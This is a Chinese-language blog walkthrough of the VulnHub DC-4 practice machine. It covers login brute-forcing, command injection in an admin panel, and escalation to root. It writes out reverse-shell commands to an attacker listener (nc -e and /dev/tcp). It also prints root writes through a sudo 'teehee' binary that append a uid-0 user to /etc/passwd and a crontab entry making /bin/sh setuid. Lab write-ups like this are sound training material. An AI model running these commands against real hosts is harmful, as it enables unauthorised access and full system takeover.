星星博客 »  > 

VulnHub-DC系列-DC4 渗透记录

0x00 靶机环境

下载地址1:https://www.vulnhub.com/entry/dc-4,313/

下载地址2:https://pan.baidu.com/s/1VSecvfMlV7dN1-W7YlxrHg 提取码: tiwz
在这里插入图片描述
只有一个flag,但是给了多个切入点。
在这里插入图片描述
开肝。


0x01 渗透流程

nmap走起
在这里插入图片描述
服务端口继续扫
在这里插入图片描述
这次有两个端口存在,不可能ssh弱密码吧,还是先来80了。
在这里插入图片描述
只有这么一个登陆界面,试了SQL什么都没反应,sqlmap也一把梭过了,啥都没。通过页面的信息收集也找不到特别有用的信息,无奈只能上大招了,同时对sshhttp进行猜解。

http猜解时使用的用户名是四个system,root,admin,administrator,密码则是使用burpsuite中的默认字典
在这里插入图片描述
感觉跑了不少出来,但是实际是只有第一个admin/happy是行的。
在这里插入图片描述
SSH则失败了,不过已经有切入点了,这个先放放,登陆后看后台是啥样
在这里插入图片描述
后台管理功能,感觉是命令执行啊,查看表单参数
在这里插入图片描述
啊哈,直接传命令的,那么就尝试下命令执行。
在这里插入图片描述
真有,那就反弹shell
在这里插入图片描述
kali上接shell
在这里插入图片描述
这里有点尴尬,接不上,没想明白为啥。
在这里插入图片描述
没办法只能换了,试了下有nc,直接用ncnc -e /bin/bash 192.168.181.141 12345
在这里插入图片描述
走起,接shell
在这里插入图片描述
python改善下shell环境python -c 'import pty;pty.spawn("/bin/bash")',查看版本信息
在这里插入图片描述
准备提权,先查看suid提权文件find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
有两个熟悉的文件,sudo -l先走
在这里插入图片描述
需要密码,那再看/home/jim/test.sh
在这里插入图片描述
让咱好好学bash呢,这脚本有权限的话,是可以用来提权的。
在这里插入图片描述
谁都能执行,GO,先测试下whoami
在这里插入图片描述
提权失败?没明白,再看一次发现。。
在这里插入图片描述
没有suid了,这么神奇的吗,绝了。这到底发生了什么。。。

不过发现了一个backups的目录,还有一个mbox疑似邮件箱的文件,不过这个mbox没有权限查看,只能先看目录了,能拿到jim权限就还可以
在这里插入图片描述
有个备份文件,似乎是历史密码本
在这里插入图片描述
用来猜解之前失败的ssh,用户名直接使用jim,再来一次
在这里插入图片描述
来了jim/jibril04ssh上去看文件。
在这里插入图片描述
啥都没啊,白瞎,继续提权
在这里插入图片描述
这里也什么都没有,再翻翻邮箱。。。
在这里插入图片描述
有惊喜,又得到一个用户,尝试走一波
在这里插入图片描述
成功登陆,第三次尝试提权。。。。
在这里插入图片描述
又是sudo,再看
在这里插入图片描述
终于有东西了。teehee --help查看下用法,感觉和tee差不多
在这里插入图片描述
单纯的管道命令,但是这里有root权限,可以写/etc/passwd,增加uid0的用户,
在这里插入图片描述
不行,这里有点小坑,sudo要放在teehee前,而不是在语句前,再来一次
echo "test:x:0:0::/root:/bin/bash"|sudo teehee -a /etc/passwd
在这里插入图片描述
增加成功,但是这里登陆不上,仍然需要密码,同时尝试过去掉中间的x即密码点位符,同样也是登陆失败,使用su切换用户也是不行的。

那就只能考虑利用teehee写配置文件了,这里利用写crontab文件

echo "* * * * * root chmod 4777 /bin/sh" |sudo teehee -a /etc/crontab

成功提权
在这里插入图片描述
怎么感觉这么套娃呢。。


0x02 总结

这是还是有点坑,几个点,一个个的来总结。

第一个坑

为啥使用bash -i >& /dev/tcp/192.168.181.141/12345 1>&2反弹shell不成功?

想不明白!!!

第二个坑

首先是那个suid消失的test.sh,重新开了一次环境,测试发现,一改内容suid就没了
在这里插入图片描述
我在kali中测试结果如下,如果是root修改文件内容,suid不消失,修改属主,suid才会消失。但是如果是普通用户修改文件内容suid会消失的。

那这个地方提权,可以用charles使用teehee增加test.sh文件内容
在这里插入图片描述
增加文件内容后,suid还在
在这里插入图片描述
但是结果还是失败了,感觉是suid的理解不太好。果然被作者教育了,需要好好学shell。。。具体回头再更。

第三个坑

admin无密码管理员用户失败的原因确实没发现为什么,但是我后来测试,用jim账户就可以成功,用charles账号则需要密码。。。

echo "admin::0:0::/root:/bin/bash"|sudo teehee -a /etc/passwd

charles失败
在这里插入图片描述
jim成功
在这里插入图片描述
不晓得是不是我把环境玩坏了的原因。重新开环境后,证实确实是环境被玩坏了。
在这里插入图片描述
没想起来是哪出问题了,算了,就这样。

相关文章